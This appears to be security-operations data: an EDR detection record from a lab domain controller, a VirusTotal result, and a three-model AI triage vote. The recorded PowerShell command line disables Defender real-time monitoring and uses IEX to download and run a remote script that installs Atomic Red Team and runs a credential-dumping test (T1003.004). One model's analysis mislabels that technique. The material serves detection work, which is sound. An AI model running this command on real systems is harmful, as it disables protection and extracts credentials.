{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 3600",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "1bd170b2-70e5-4fe6-9fc9-c94469c2a850",
  "gen_time": 1774364752117,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364752000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was there an authorized penetration test or Red Team exercise occurring at the time of the detection?",
    "What process or service created the batch file in the C:\\Windows\\TEMP directory?",
    "Are there any other similar events on this host or across the environment within the same timeframe?"
  ],
  "ioc_analysis": "The process powershell.exe is a legitimate Microsoft-signed binary. However, the command line is highly suspicious as it performs system tampering (disabling Defender) and executes code from a remote repository (GitHub) to perform credential dumping tests.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "C:\\Windows\\TEMP\\pldC873.tmp.bat",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1003.004",
    "T1105"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify if this activity was authorized as part of a scheduled security simulation or audit.",
    "If unauthorized, isolate the affected sensor immediately and initiate incident response for host tampering and credential access.",
    "Enable PowerShell script block logging (EID 4104) to capture decrypted scripts executed via IEX.",
    "Review the contents of the batch file pldC873.tmp.bat to identify the initial infection vector or script source."
  ],
  "risk_score": 87,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nPowerShell was used to disable Windows Defender Real-time Monitoring and execute Atomic Red Team tests for credential dumping (LSA Secrets). While the use of the official Red Canary repository suggests this is a security simulation, the activity itself is a successful bypass of security controls and should be validated as authorized.\n\n**IOC Analysis:** The process powershell.exe is a legitimate Microsoft-signed binary. However, the command line is highly suspicious as it performs system tampering (disabling Defender) and executes code from a remote repository (GitHub) to perform credential dumping tests.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence attack attempt where an attacker used PowerShell to disable real-time monitoring and execute the Atomic Red Team framework for testing T1003.004 (Exploitation Publicly Available Exploit). The process is signed by Microsoft but executed via suspicious command-line arguments that bypass security controls.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, and the binary is Microsoft-signed (FILE_IS_SIGNED: 1). However, the command line contains malicious indicators including Set-MpPreference to disable real-time monitoring, IEX (Invoke-Expression) with a URL from GitHub, and execution of Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell under SYSTEM privileges, which is suspicious for lateral movement or privilege escalation testing.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process running as SYSTEM disables real-time monitoring and installs Atomic Red Team, a penetration testing tool, which is suspicious given the elevated privileges and parent process from TEMP. This could indicate evasion tactics or unauthorized red team activity.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows PowerShell executable in the expected directory. The HASH is Microsoft-signed, indicating it\u0027s a trusted binary. However, the COMMAND_LINE includes commands to disable real-time monitoring and install Atomic Red Team, which is often used in adversary simulations but here runs as SYSTEM, raising suspicion. The PARENT_PROCESS is cmd.exe from TEMP, which is a common red flag for malicious scripts.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}